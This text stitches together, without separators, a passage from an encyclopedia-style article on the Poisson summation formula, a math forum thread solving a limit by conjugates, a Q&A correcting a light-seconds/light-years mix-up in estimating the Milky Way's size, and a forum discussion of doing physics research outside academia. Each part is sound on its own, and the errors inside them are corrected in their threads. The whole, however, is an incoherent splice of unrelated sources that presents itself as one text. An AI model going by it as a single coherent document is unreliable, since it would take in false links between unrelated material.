With another definition, $s(t+x)\ \stackrel{\text{def}}{=}\ g(x)$, and the transform property $\mathcal{F}\{s(t+x)\} = \hat s(\nu)\cdot e^{i 2\pi \nu t}$, Eq.2 becomes a periodic summation (with period $P$) and its equivalent Fourier series:

$$\underbrace{\sum_{n=-\infty}^{\infty} s(t + nP)}_{S_P(t)} = \sum_{k=-\infty}^{\infty} \underbrace{\frac{1}{P}\cdot \hat s\left(\frac{k}{P}\right)}_{S[k]}\ e^{i 2\pi \frac{k}{P} t }$$     (Pinsky 2002; Zygmund 1968). (Eq.3)

Similarly, the periodic summation of a function's Fourier transform has this Fourier series equivalent:

$$\sum_{k=-\infty}^{\infty} \hat s(\nu + k/T) = \sum_{n=-\infty}^{\infty} T\cdot s(nT)\ e^{-i 2\pi n T \nu} \equiv \mathcal{F}\left\{ \sum_{n=-\infty}^{\infty} T\cdot s(nT)\ \delta(t-nT)\right\},$$ (Eq.4)

where $T$ represents the time interval at which a function $s(t)$ is sampled, and $1/T$ is the sampling rate in samples per second.

## Distributional formulation

These equations can be interpreted in the language of distributions (Córdoba 1988; Hörmander 1983, §7.2) for a function $f$ whose derivatives are all rapidly decreasing (see Schwartz function). Using the Dirac comb distribution and its Fourier series:

$$\sum_{n=-\infty}^\infty \delta(x-nT) \equiv \sum_{k=-\infty}^\infty \frac{1}{T}\cdot e^{-i 2\pi \frac{k}{T} x} \quad\stackrel{\mathcal{F}}{\Longleftrightarrow}\quad \frac{1}{T}\cdot \sum_{k=-\infty}^{\infty} \delta (\nu+k/T).$$ (Eq.7)

In other words, the periodization of a Dirac delta $\delta$, resulting in a Dirac comb, corresponds to the discretization of its spectrum, which is constantly one. Hence, this again is a Dirac comb but with reciprocal increments.
\begin{align} \sum_{k=-\infty}^\infty \hat f(k) &= \sum_{k=-\infty}^\infty \left(\int_{-\infty}^{\infty} f(x)\ e^{-i 2\pi k x} dx \right) = \int_{-\infty}^{\infty} f(x) \underbrace{\left(\sum_{k=-\infty}^\infty e^{-i 2\pi k x}\right)}_{\sum_{n=-\infty}^\infty \delta(x-n)} dx \\ &= \sum_{n=-\infty}^\infty \left(\int_{-\infty}^{\infty} f(x)\ \delta(x-n)\ dx \right) = \sum_{n=-\infty}^\infty f(n). \end{align} Similarly: \begin{align} \sum_{k=-\infty}^{\infty} \hat s(\nu + k/T) &= \sum_{k=-\infty}^{\infty} \mathcal{F}\left \{ s(t)\cdot e^{-i 2\pi\frac{k}{T}t}\right \}\\ &= \mathcal{F} \bigg \{s(t)\underbrace{\sum_{k=-\infty}^{\infty} e^{-i 2\pi\frac{k}{T}t}}_{T \sum_{n=-\infty}^{\infty} \delta(t-nT)}\bigg \} = \mathcal{F}\left \{\sum_{n=-\infty}^{\infty} T\cdot s(nT) \cdot \delta(t-nT)\right \}\\ &= \sum_{n=-\infty}^{\infty} T\cdot s(nT) \cdot \mathcal{F}\left \{\delta(t-nT)\right \} = \sum_{n=-\infty}^{\infty} T\cdot s(nT) \cdot e^{-i 2\pi nT \nu}. \end{align} ## Derivation We can also prove that Eq.3 holds in the sense that if s(t)  ∈ L1(R), then the right-hand side is the (possibly divergent) Fourier series of the left-hand side. This proof may be found in either (Pinsky 2002) or (Zygmund 1968). It follows from the dominated convergence theorem that sP(t) exists and is finite for almost every t. And furthermore it follows that sP is integrable on the interval [0,P]. The right-hand side of Eq.3 has the form of a Fourier series. So it is sufficient to show that the Fourier series coefficients of sP(t) are \scriptstyle \frac{1}{P} \hat s\left(\frac{k}{P}\right).. Proceeding from the definition of the Fourier coefficients we have: \begin{align} S[k]\ &\stackrel{\text{def}}{=}\ \frac{1}{P}\int_0^{P} s_P(t)\cdot e^{-i 2\pi \frac{k}{P} t}\, dt\\ &=\ \frac{1}{P}\int_0^{P} \left(\sum_{n=-\infty}^{\infty} s(t + nP)\right) \cdot e^{-i 2\pi\frac{k}{P} t}\, dt\\ &=\ \frac{1}{P} \sum_{n=-\infty}^{\infty} \int_0^{P} s(t + nP)\cdot e^{-i 2\pi\frac{k}{P} t}\, dt, \end{align} where the interchange of summation with integration is once again justified by dominated convergence. With a change of variables (τ = t + nP) this becomes: \begin{align} S[k] = \frac{1}{P} \sum_{n=-\infty}^{\infty} \int_{nP}^{nP + P} s(\tau) \ e^{-i 2\pi \frac{k}{P} \tau} \ \underbrace{e^{i 2\pi k n}}_{1}\,d\tau \ =\ \frac{1}{P} \int_{-\infty}^{\infty} s(\tau) \ e^{-i 2\pi \frac{k}{P} \tau} d\tau = \frac{1}{P}\cdot \hat s\left(\frac{k}{P}\right) \end{align}       QED. ## Applicability Eq.3 holds provided s(t) is a continuous integrable function which satisfies |s(t)| + |\hat{s}(t)| \le C (1+|t|)^{-1-\delta} for some C, δ > 0 and every t (Grafakos 2004; Stein & Weiss 1971). Note that such s(t) is uniformly continuous, this together with the decay assumption on s, show that the series defining sP converges uniformly to a continuous function.   Eq.3 holds in the strong sense that both sides converge uniformly and absolutely to the same limit (Stein & Weiss 1971). Eq.3 holds in a pointwise sense under the strictly weaker assumption that s has bounded variation and 2\cdot s(t)=\lim_{\varepsilon\to 0} s(t+\varepsilon) + \lim_{\varepsilon\to 0} s(t-\varepsilon)     (Zygmund 1968). The Fourier series on the right-hand side of Eq.3 is then understood as a (conditionally convergent) limit of symmetric partial sums. 
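For a rapidly decaying function such as a Gaussian, all of these hypotheses hold, and Eq.1 is easy to check numerically. The following sketch (not part of the article) uses the fact that, with the transform convention of note 1, the transform of $\exp(-\pi(x/s)^2)$ is $s\exp(-\pi(s\nu)^2)$.

```python
import numpy as np

def f(x, s=0.7):
    return np.exp(-np.pi * (x / s) ** 2)

def f_hat(nu, s=0.7):
    # Fourier transform under the convention of note 1:
    # the transform of exp(-pi (x/s)^2) is s * exp(-pi (s*nu)^2).
    return s * np.exp(-np.pi * (s * nu) ** 2)

n = np.arange(-50, 51)
lhs = f(n).sum()          # sum over n of f(n)
rhs = f_hat(n).sum()      # sum over k of f_hat(k)
print(lhs, rhs)           # the two sums agree to machine precision
```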
As shown above, Eq.3 holds under the much less restrictive assumption that s(t) is in L1(R), but then it is necessary to interpret it in the sense that the right-hand side is the (possibly divergent) Fourier series of sP(t) (Zygmund 1968). In this case, one may extend the region where equality holds by considering summability methods such as Cesàro summability. When interpreting convergence in this way Eq.2 holds under the less restrictive conditions that g(x) is integrable and 0 is a point of continuity of gP(x). However Eq.2 may fail to hold even when both g\, and \hat{g} are integrable and continuous, and the sums converge absolutely (Katznelson 1976). ## Applications ### Method of images In partial differential equations, the Poisson summation formula provides a rigorous justification for the fundamental solution of the heat equation with absorbing rectangular boundary by the method of images. Here the heat kernel on R2 is known, and that of a rectangle is determined by taking the periodization. The Poisson summation formula similarly provides a connection between Fourier analysis on Euclidean spaces and on the tori of the corresponding dimensions (Grafakos 2004). In one dimension, the resulting solution is called a theta function. ### Sampling In the statistical study of time-series, if f is a function of time, then looking only at its values at equally spaced points of time is called "sampling." In applications, typically the function f is band-limited, meaning that there is some cutoff frequency f_o such that the Fourier transform is zero for frequencies exceeding the cutoff: \hat{f}(\xi)=0 for |\xi|>f_o. For band-limited functions, choosing the sampling rate 2f_o guarantees that no information is lost: since \hat f can be reconstructed from these sampled values, then, by Fourier inversion, so can f. This leads to the Nyquist–Shannon sampling theorem (Pinsky 2002). ### Ewald summation Computationally, the Poisson summation formula is useful since a slowly converging summation in real space is guaranteed to be converted into a quickly converging equivalent summation in Fourier space. (A broad function in real space becomes a narrow function in Fourier space and vice versa.) This is the essential idea behind Ewald summation. ### Lattice points in a sphere The Poisson summation formula may be used to derive Landau's asymptotic formula for the number of lattice points in a large Euclidean sphere. It can also be used to show that if an integrable function, f\, and \hat f both have compact support then f = 0\,  (Pinsky 2002). ### Number theory In number theory, Poisson summation can also be used to derive a variety of functional equations including the functional equation for the Riemann zeta function.[1] One important such use of Poisson summation concerns theta functions: periodic summations of Gaussians . Put q= e^{i\pi \tau } , for \tau a complex number in the upper half plane, and define the theta function: \theta ( \tau) = \sum_n q^{n^2}. The relation between \theta (-1/\tau) and \theta (\tau) turns out to be important for number theory, since this kind of relation is one of the defining properties of a modular form. By choosing f= e^{-\pi x^2} in the second version of the Poisson summation formula (with a = 0), and using the fact that \hat f = e^{-\pi \xi ^2} , one gets immediately \theta \left({-1\over\tau}\right) = \sqrt{ \tau \over i} \theta (\tau) by putting {1/\lambda} = \sqrt{ \tau/i} . 
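The transformation law just obtained is also easy to test numerically. The sketch below (not from the article) evaluates both sides of $\theta(-1/\tau)=\sqrt{\tau/i}\,\theta(\tau)$ at an arbitrary point of the upper half-plane, using the principal branch of the square root.

```python
import numpy as np

def theta(tau, nmax=60):
    """theta(tau) = sum_n q^(n^2) with q = exp(i*pi*tau), truncated at |n| <= nmax."""
    n = np.arange(-nmax, nmax + 1)
    q = np.exp(1j * np.pi * tau)
    return np.sum(q ** (n ** 2))

tau = 0.3 + 1.1j                        # any point in the upper half-plane
lhs = theta(-1 / tau)
rhs = np.sqrt(tau / 1j) * theta(tau)    # principal branch of the square root
print(lhs, rhs)                         # the two values agree to high precision
```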
It follows from this that \theta^8 has a simple transformation property under \tau \mapsto {-1/ \tau} and this can be used to prove Jacobi's formula for the number of different ways to express an integer as the sum of eight perfect squares. ## Generalizations The Poisson summation formula holds in Euclidean space of arbitrary dimension. Let Λ be the lattice in Rd consisting of points with integer coordinates; Λ is the character group, or Pontryagin dual, of Rd. For a function ƒ in L1(Rd), consider the series given by summing the translates of ƒ by elements of Λ: \sum_{\nu\in\Lambda} f(x+\nu). Theorem For ƒ in L1(Rd), the above series converges pointwise almost everywhere, and thus defines a periodic function Pƒ on Λ. Pƒ lies in L1(Λ) with ||Pƒ||1 ≤ ||ƒ||1. Moreover, for all ν in Λ, Pƒ̂(ν) (Fourier transform on Λ) equals ƒ̂(ν) (Fourier transform on Rd). When ƒ is in addition continuous, and both ƒ and ƒ̂ decay sufficiently fast at infinity, then one can "invert" the domain back to Rd and make a stronger statement. More precisely, if |f(x)| + |\hat{f}(x)| \le C (1+|x|)^{-d-\delta} for some C, δ > 0, then \sum_{\nu\in\Lambda} f(x+\nu) = \sum_{\nu\in\Lambda}\hat{f}(\nu)e^{2\pi i x\cdot\nu},     (Stein & Weiss 1971, VII §2) where both series converge absolutely and uniformly on Λ. When d = 1 and x = 0, this gives the formula given in the first section above. More generally, a version of the statement holds if Λ is replaced by a more general lattice in Rd. The dual lattice Λ′ can be defined as a subset of the dual vector space or alternatively by Pontryagin duality. Then the statement is that the sum of delta-functions at each point of Λ, and at each point of Λ′, are again Fourier transforms as distributions, subject to correct normalization. This is applied in the theory of theta functions, and is a possible method in geometry of numbers. In fact in more recent work on counting lattice points in regions it is routinely used − summing the indicator function of a region D over lattice points is exactly the question, so that the LHS of the summation formula is what is sought and the RHS something that can be attacked by mathematical analysis. ### Selberg trace formula Further generalisation to locally compact abelian groups is required in number theory. In non-commutative harmonic analysis, the idea is taken even further in the Selberg trace formula, but takes on a much deeper character. A series of mathematicians applying harmonic analysis to number theory, most notably Martin Eichler, Atle Selberg, Robert Langlands, and James Arthur, have generalised the Poisson summation formula to the Fourier transform on non-commutative locally compact reductive algebraic groups G with a discrete subgroup \Gamma such that G/\Gamma has finite volume. For example, G can be the real points of GL_n and \Gamma can be the integral points of GL_n. In this setting, G plays the role of the real number line in the classical version of Poisson summation, and \Gamma plays the role of the integers n that appear in the sum. The generalised version of Poisson summation is called the Selberg Trace Formula, and has played a role in proving many cases of Artin's conjecture and in Wiles's proof of Fermat's Last Theorem. The left-hand side of (1) becomes a sum over irreducible unitary representations of G, and is called "the spectral side," while the right-hand side becomes a sum over conjugacy classes of \Gamma, and is called "the geometric side." 
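The multidimensional statement in the Generalizations section can likewise be checked numerically. Here is a short sketch (not from the article) for $d=2$ with the self-dual Gaussian $f(x)=e^{-\pi|x|^2}$, whose Fourier transform is itself.

```python
import numpy as np

# Check the d = 2 Poisson summation identity for the self-dual Gaussian
# f(x) = exp(-pi |x|^2) at an arbitrary shift x.
x = np.array([0.3, 0.7])
m, n = np.meshgrid(np.arange(-20, 21), np.arange(-20, 21))

lhs = np.sum(np.exp(-np.pi * ((x[0] + m) ** 2 + (x[1] + n) ** 2)))
rhs = np.sum(np.exp(-np.pi * (m ** 2 + n ** 2))
             * np.exp(2j * np.pi * (x[0] * m + x[1] * n)))
print(lhs, rhs.real)      # agree; the imaginary part of rhs is ~0
```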
The Poisson summation formula is the archetype for vast developments in harmonic analysis and number theory.

## Notes

1. ^ $\hat{f}(\nu)\ \stackrel{\mathrm{def}}{=}\ \int_{-\infty}^{\infty} f(x)\ e^{-2\pi i\nu x}\, dx.$

## References

1. ^ H. M. Edwards (1974). Riemann's Zeta Function. Academic Press. ISBN 0-486-41740-9. (pages 209–211)
• Benedetto, J. J.; Zimmermann, G. (1997), "Sampling multipliers and the Poisson summation formula", J. Fourier Anal. Appl. 3 (5).
• Córdoba, A., "La formule sommatoire de Poisson", C. R. Acad. Sci. Paris, Series I 306: 373–376.
• Gasquet, Claude; Witomski, Patrick (1999), Fourier Analysis and Applications, Springer, pp. 344–352.
• Grafakos, Loukas (2004), Classical and Modern Fourier Analysis, Pearson Education, Inc., pp. 253–257.
• Higgins, J. R. (1985), "Five short stories about the cardinal series", Bull. Amer. Math. Soc. 12 (1): 45–89.
• Katznelson, Yitzhak (1976), An Introduction to Harmonic Analysis (Second corrected ed.), New York: Dover Publications, Inc.
• Pinsky, M. (2002), Introduction to Fourier Analysis and Wavelets, Brooks Cole.
• Stein, Elias; Weiss, Guido (1971), Introduction to Fourier Analysis on Euclidean Spaces, Princeton, N.J.: Princeton University Press.
1. ## limit problem $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x}$ 2. Originally Posted by thangbe $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x}$ Several approaches are possible. There's a simple one if you know differential calculus ..... you can consider the function $\displaystyle f(a) = \frac{1}{\sqrt{a + 2}}$. Then, with a (perhaps disquieting) change from the usual notation ($\displaystyle x$ instead of $\displaystyle h$, $\displaystyle a$ instead of $\displaystyle x$) you can consider the derivative of $\displaystyle f(a)$ from first principles: $\displaystyle f'(a) = \lim_{x \rightarrow 0} \frac{f(a + x) - f(a)}{x}$. So the answer will be the derivative of f(a) with respect to a .... 3. Originally Posted by thangbe $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x}$ If you set x= 0, the numerator is $\displaystyle \frac{1}{\sqrt{a+ 2}}- \frac{1}{\sqrt{a}}$ which is clearly NOT equal to 0 but the denominator is 0. Obviously this limit does not exist. 4. Originally Posted by HallsofIvy If you set x= 0, the numerator is $\displaystyle \frac{1}{\sqrt{a+ 2}}- \frac{1}{\sqrt{a}}$ which is clearly NOT equal to 0 but the denominator is 0. Obviously this limit does not exist. Dang it. I misread the red x for a 2: ]$\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+{\color{red}x}}}}{x}$ Hmmmmmm ... I bet that red x is meant to be a 2 .... 5. the limit is exists and the answer is. $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x} =\frac {-1}{2{(a+2)}^\frac{3}{2}}$ but I don't know how to show for it. 6. Originally Posted by thangbe the limit is exists and the answer is. $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x} =\frac {-1}{2{(a+2)}^\frac{3}{2}}$ but I don't know how to show for it. So you have mistyped the question as I suspected - see post #4. One way of getting the answer is given in post #2. Study it. If you do not understand that method, then you will need to say so. There are several other methods that can be used. 7. I understand in your post #2 that why I get that answer. However my teacher didn't allows us to use that menthod thank you for you help sir. 8. Clearly there is a typo. But once that is resolved, my favourite way to solve these type of limits is by multiplying by the conjugate. Not many people teach that these days. 9. Originally Posted by matheagle Clearly there is a typo. But once that is resolved, my favourite way to solve these type of limits is by multiplying by the conjugate. Not many people teach that these days. I was going to do that but decided it was too much work to type it up. 10. I agree. I'm helping someone right now. But substituting the math and typing tex at the same is tough for me. I'm afraid I'll do a stupid calculation and I cannot edit after 15 minutes. Leaving forever with a dumb math error. That would be embarassing. I really like the conjugate technique. 11. uhm... could you just simply tell me the procedure.? or just give a simple example. So that I can figure it out.... I was stuck in how to get x out of the squareroot value. 12. Originally Posted by thangbe I understand in your post #2 that why I get that answer. However my teacher didn't allows us to use that menthod thank you for you help sir. Note that $\displaystyle \frac{1}{\sqrt{a + x + 2}} - \frac{1}{\sqrt{a+2}} = \frac{\sqrt{a+2} - \sqrt{a+x+2}}{\sqrt{a+x+2} \, \sqrt{a+2}}$. 
Therefore: $\displaystyle \frac{\frac{1}{\sqrt{a + x + 2}} - \frac{1}{\sqrt{a+2}}}{x} = \frac{\sqrt{a+2} - \sqrt{a+x+2}}{x \sqrt{a+x+2} \, \sqrt{a+2}}$ $\displaystyle = \frac{(\sqrt{a+2} - \sqrt{a+x+2}) \cdot (\sqrt{a+2} + \sqrt{a+x+2})}{x \sqrt{a+x+2} \, \sqrt{a+2} \cdot (\sqrt{a+2} + \sqrt{a+x+2})}$ $\displaystyle = \frac{(a + 2) - (a + x + 2)}{x \sqrt{a+x+2} \, \sqrt{a+2} \cdot (\sqrt{a+2} + \sqrt{a+x+2})}$ $\displaystyle = \frac{-x}{x \sqrt{a+x+2} \, \sqrt{a+2} \cdot (\sqrt{a+2} + \sqrt{a+x+2})}$ $\displaystyle = \frac{-1}{\sqrt{a+x+2} \, \sqrt{a+2} \cdot (\sqrt{a+2} + \sqrt{a+x+2})}$. Now take the limit $\displaystyle x \rightarrow 0$. 13. thank you so much for helping
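As a quick check on the result (a minimal SymPy sketch added here, not taken from the thread; it assumes $a > 0$), the limit can be evaluated directly and compared against the derivative approach from post #2:

```python
import sympy as sp

a, x = sp.symbols('a x', positive=True)

# The corrected difference quotient (with the typo fixed: a + 2 in the second term, not a + x)
expr = (1/sp.sqrt(a + x + 2) - 1/sp.sqrt(a + 2)) / x

# Direct limit as x -> 0
lim = sp.limit(expr, x, 0)
print(lim)                                  # -1/(2*(a + 2)**(3/2))

# Same answer via post #2: the derivative of f(a) = 1/sqrt(a + 2) with respect to a
f = 1/sp.sqrt(a + 2)
print(sp.simplify(sp.diff(f, a) - lim))     # 0, so the two approaches agree
```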
# Estimating the size of the Milky Way from the Sun's motion

I am trying to run a simple first-principles calculation to estimate the diameter of the Milky Way from what we know about the motion of the Sun around its center. In particular, from various online sources and books, we can roughly say that:

• The period of the Sun's orbit around the center of the Milky Way is $$T_{sun}\approx 200$$ million years.
• The speed of the Sun in its orbit is $$v_{sun}\approx 200$$ km/s.
• The Sun is located about halfway between the Milky Way's center and its edge.

This is a purely kinematic problem. I'll assume that the Sun's orbit is circular, so that we may write: $$\omega_{sun}r_{sun} = v_{sun},$$ where $$\omega_{sun}=2\pi/T_{sun}$$ is the angular velocity of the Sun around the Milky Way center. Hence: $$r_{sun} = \frac{T_{sun}}{2\pi}v_{sun}.$$ The radius of the Milky Way is twice that (the Sun is halfway out to the edge), and the diameter is twice that again. So the overall diameter of the Milky Way, in light years (denoting the speed of light by $$c$$): $$d_{MilkyWay} = \frac{2T_{sun}v_{sun}}{c\pi}.$$ We know all the quantities on the right-hand side. A short Python script evaluates the result.

```python
T_sun = (200e6)*365.25*24*3600     # [s]
v_sun = 200e3                      # [m/s]
c = 2.99792458e8                   # [m/s]
pi = 3.14159
d_MilkyWay = 2*T_sun*v_sun/(c*pi)  # [ly]
print("d_MilkyWay = %.2e [light years]" % d_MilkyWay)
```

The answer: $$d_{MilkyWay} = 2.68\cdot 10^{12}$$ light years. This is much, much larger than the current best estimate given by scientists: about $$10^5$$ light years. How come there is such a huge discrepancy between the measured size and my rough estimate? Is the assumption that the Sun's orbit is circular wrong?

• Wait - are you missing a huge problem? Gravity is totally f'd up in galaxies, it doesn't behave anything, at all, like it "should". Google up "galaxy rotation problem!" – Fattie Sep 14 '20 at 19:22
• The galaxy rotation problem doesn't have much to do with the Sun's revolution around the center of the galaxy. – chepner Sep 14 '20 at 22:52
• BTW, math.pi gets you more digits of precision. – Acccumulation Sep 14 '20 at 23:06
• @Acccumulation: Using a not-so-precise value for $\pi$ could actually be considered a feature here, since it shows that it's just some back-of-the-envelope calculation, and it won't be used for rocket science. Who cares about $\frac{3.14159}{3.1415926535 8979323846 2643383279}$ when the assumptions are wrong by ~15% and the calculations are wrong by a factor 31536000? – Eric Duminil Sep 15 '20 at 8:04
• @EricDuminil Yeah, I thought about that. But the OP cares enough to get $c$ to the last digit. – Acccumulation Sep 15 '20 at 18:19

You messed up a bit in your calculation. Your answer is in light-seconds, not light-years. If you divide by the number of seconds in a year, you'll get the correct answer.

```python
T_sun = (200e6)*365.25*24*3600                # [s]
v_sun = 200e3                                 # [m/s]
c = 2.99792458e8                              # [m/s]
pi = 3.14159
d_Milkyway_m = 2*T_sun*v_sun/pi               # [m]
d_MilkyWay = d_Milkyway_m/(c*365.25*24*3600)  # [ly]
print("d_MilkyWay = %.2e [light years]" % d_MilkyWay)
```

• Or alternatively, don't convert T_sun to seconds in the first place! :) – Philip Sep 13 '20 at 20:42
• Yep, that's probably easier when it comes to the number of operations but could be harder when it comes to figuring out the units at each step :) – Leo Adberg Sep 13 '20 at 20:43
• Wow! Rookie mistake, thanks a lot :) – space_voyager Sep 13 '20 at 21:52

It took me embarrassingly long to figure this out.
Your calculations are mostly correct, except at the end. The "diameter" of the Milky Way would indeed be $$d = 2 \frac{T_\text{sun} v_\text{sun}}{c\pi},$$ but this is in light-seconds not years. You need to further divide this by the number of seconds in one year. And if you do this, you will find that $$d \approx 85,000 \text{ light years}.$$ (Alternatively, and perhaps much more efficiently, you could just measure $$T_\text{sun}$$ in years, that would give the same answer with fewer calculations.) Dimensional analysis is hard, and I just wanted to verify the calculations of other answers here. Since you are using Python, you should know that there are tools that can assist in dimensional analysis; These tools can be very helpful and would in this case show you where you went wrong. Taking your sample code and turning it into a dimensional one, using pint (other tools for dimensional analysis are available), will look as follows: import pint U = pint.UnitRegistry() T_sun = 200e6 * U.years v_sun = 200 * U.km / U.s r_sun = (T_sun / (2 * U.pi)) * v_sun d_milkyway = 2 * 2 * r_sun print('d_milkyway ~ {:.1f}'.format(d_milkyway.to('light_years'))) Which yields d_milkyway ~ 84941.4 light_year Note that if we omit the conversion to('light_years'), we would see d_milkyway ~ 8.0e+10 kilometer * year / pi / second • Ooh, what a nice-looking tool! – rob Sep 14 '20 at 15:43 • Oh, and I should mention that if you mess up the units and try to convert to an incompatible unit, you will get an error (that's half the point of pint), e.g. should you accidentally divide by v_sun instead of multiply, pint would say Cannot convert from [time] ** 2 / [length] to [length]. – Pål GD Sep 14 '20 at 21:46 • Excellent answer. And using the incorrect formula above, with $c$ : (2 * 200e6 * U.years * 200 * (U.km / U.s) / (U.pi * U.speed_of_light)).to('lightyear') fails with Cannot convert from 'kilometer * year / pi / second / speed_of_light' ([time]) to 'light_year' ([length]). Years aren't light-years and pint knows it. Cool little library! – Eric Duminil Sep 15 '20 at 7:57 • You can also use to_base_units() which converts it (in this case) to seconds. – Pål GD Sep 15 '20 at 10:44 # Problem: Wrong units $$d_{MilkyWay} = \frac{2T_{sun}v_{sun}}{c\pi}$$ And that's your first problem, right here. You cannot disregard units and expect to get any correct or even well-defined result from your calculations. The left-hand side is a distance (e.g. in meters, light-years or light-seconds), the right-hand side is a duration. This cannot work, and you cannot use this equation anywhere. Light-years are not years, just like light-seconds are not seconds. # Solution: Remove $$c$$ The correct formula is simply: $$d_{MilkyWay} = \frac{2T_{sun}v_{sun}}{\pi}$$ # Order of magnitude Before using any tool in order to calculate the exact result, you should first try to get some idea about the correct order of magnitude (see Fermi problem). The goal should be to simplify the calculation until it becomes easy to do mentally, without being too wrong. So $$3 \approx 1$$ and $$4 \approx 10$$ are perfectly acceptable, but $$10^5\approx10^{12}$$ isn't. You could notice that 200 km/s is approximately $$\frac{c}{1000}$$. 
Here's the order-of-magnitude estimate: \begin{align} d_{MilkyWay} & \approx \frac{2v_{sun}T_{sun}}{\pi} \\ & \approx \frac{2*200\mathrm{km/s}*200\thinspace000\thinspace000\mathrm{y}}{\pi} \\ & \approx \frac{2*\frac{c}{1\thinspace000}*200\thinspace000\thinspace000\mathrm{y}}{\pi} \\ & \approx \frac{2*c*200\thinspace000\mathrm{y}}{\pi} \\ & \approx \frac{400\thinspace000}{\pi}*c*\mathrm{y} \\ & \approx 100\thinspace000 \mathrm{ly} \end{align} This is not the exact answer. But whichever tool you use, you should expect to get a result not too far away from $$10^{5}\mathrm{ly}$$. # Result ## With Python If you want to stick with Python, you could use @PålGD's excellent answer. ## With Wolfram Alpha Wolfram Alpha does a good job at converting units: 2*200km/s*200million years/pi to lightyears You get many different units as a bonus, and even a direct comparison to the correct galactic diameter: ## With Qalculate Qalculate! is an excellent desktop calculator, and it supports many units: • Why is the total number of limbs 10 instead of 1? – Itsme2003 Sep 15 '20 at 2:39 • @Itsme2003: Interesting question. There's more info at what-if.xkcd.com/84 (linked from the comic above). Basically, it's because we're talking about orders of magnitude, so it makes sense to use a logarithmic scale. And on this scale, $10^{0.5} = \sqrt(10) \approx 3.16$ is right in the middle of $10^{0} = 1$ and $10^{1} = 10$. So 3 rounds to 1 because it's smaller than 3.16, and 4 rounds to 10 because it's larger than 3.16. – Eric Duminil Sep 15 '20 at 7:00
Leaving Academia While Still Contributing to Physics Research

• Physics

Main Question or Discussion Point

There is a theoretical physicist by the name of Garret Lisi. He gave a TED Talk on one of his unified physics theories that received a lot of attention. The reason why I am bringing him up is because he left academia after he finished his PhD and moved to Maui. During his time there he found part-time gigs just to get by but didn't want to make big commitments because he feared it would take away too much time from his research. I believe now he's financially stable and is able to contribute successfully to physics without being in academia. I guess what I'm trying to ask is: do you really need to be in academia to be a successful theoretical physicist (not experimental), since they don't work in labs? In today's day and age, it is easier than it has ever been to make passive income as a result of the development of technology, social media, etc. I recently completed a double major in mathematics and physics and plan on pursuing a PhD program in theoretical particle physics and want to live the lifestyle of Garret Lisi.

Answers and Replies

George Jones (Staff Emeritus, Science Advisor, Gold Member)
Garret Lisi shows that this is possible, but, unfortunately, the set $\left\{ \mathrm{Garret ~ Lisi} \right\}$ is not a statistically relevant sample.

Orodruin (Staff Emeritus, Science Advisor, Homework Helper, Gold Member, 2018 Award)
Garret Lisi shows that this is possible, but, unfortunately, the set $\left\{ \mathrm{Garret ~ Lisi} \right\}$ is not a statistically relevant sample.
It also suffers from selection bias...

Thank you Dr. Jones and Orodruin for your replies. You're certainly right that the example I gave is not statistically significant. But if a theoretical physicist hypothetically found a way to financially support themselves, then what is the added benefit of going into academia if you can conduct the research on your own? If you found a way to get passive income that doesn't demand as much time as the administrative and teaching duties of a professor, then wouldn't it be better to avoid academia if you can still do research on your own?

Choppy (Science Advisor, Education Advisor)
It's probably worth asking the question - if it's so great, why aren't there more people doing it?

I think one factor to consider is that "passive income" is either not as passive as it sounds, or doesn't provide much in the way of reliable, steady income.

Secondly, even if you're a theorist, it's quite challenging to do research in a vacuum. Consider journal access - a lot more of a challenge if you're not affiliated with a university. Simply having other people to have passive hallway conversations with can have an enormous influence on your work too. Ever have an idea that sounded good in your head, but then fell apart as soon as you started explaining it to someone? Without being around other academics, those ideas might get all the way to a journal submission before someone checks you. Think about colloquia: speakers coming in both from around campus and from other universities to share their work. How will you gain access to those kinds of ideas on your own? And what about conferences for that matter?

Students, particularly graduate students, can often be a lot of help too. They challenge you, force you to reinforce your own knowledge and re-examine foundational ideas in your field. And they bring new ideas and enthusiasm with them.
There is also the question of how you'll handle it when research isn't going well. When you're on your own, it's a lot easier to shrug it off and do something else. When you've got collaborators counting on your contribution to a grant proposal, you push through even when the personal motivation isn't there.

That's not to say it can't be done, doing research on your own, but it's rare for people to do it successfully and I think there are a lot of reasons behind that.

WWGD (Science Advisor, Gold Member)
Well, Wyatt, now you know the caveats, so you can plan ahead, see if you can build around them, and see if you want to stick with it.

Vanadium 50 (Staff Emeritus, Science Advisor, Education Advisor)
I think you need to take a closer look at Lisi before you try and emulate him.
1. The reason that the press ran with this story is precisely because it is unusual. ("Man bites dog" and all)
2. Lisi's impact on the field is not nearly as large as the press might have you believe. His most cited paper has 54 cites, with very few "big names" citing it: Bjorken says it's interesting and Distler says it's wrong. (I'm an experimenter who has written a few theory papers, and my theory publication record is stronger than Lisi's.)
3. Even Lisi writes with collaborators, and in fact, his citation count for papers with co-authors is higher than for the papers he wrote alone. (That's kind of why we do it.)

If you want to do this because you want to do this, great. Have at it. But if you think you are going to make a huge impact doing this, you might want to rethink this.

gleem (Science Advisor, Education Advisor)
@wyattbohr I think that when Lisi was at your point in his education he had no idea that he would be where he is today. If it were not for an investment break he might not be in Maui today. His work and interests are controversial, so remaining in academia might not have been something of his choosing. His creation of a science hostel may indicate that he feels a need, or recognizes, that closer contact with fellow researchers has advantages. Communication via the internet is clumsy, and neither as spontaneous nor as stimulating as direct face-to-face interaction.

....and want to live the lifestyle of Garret Lisi.
I believe this is a poor focus for a potential PhD candidate to have.

Dr. Courtney (Education Advisor, Gold Member, 2018 Award)
Most of my publications were authored at times when I did not hold a college faculty position, including everything I've published in the past 5 years. It is mostly meat and potatoes work in blast physics and ballistics. So yes, I am making contributions to physics, but nothing earth shattering.

So, it's certainly possible. But since I rarely publish solo papers, interactions with students and colleagues are essential to my creative process. I've managed to cultivate and maintain these relationships without holding a faculty position. But it takes more work and an intentional approach. I may not publish any papers in 2019, because of a lull in collaborative activities. No worries though, I'm already working on several projects with colleagues that will be ready for publication in 2020 and/or 2021.
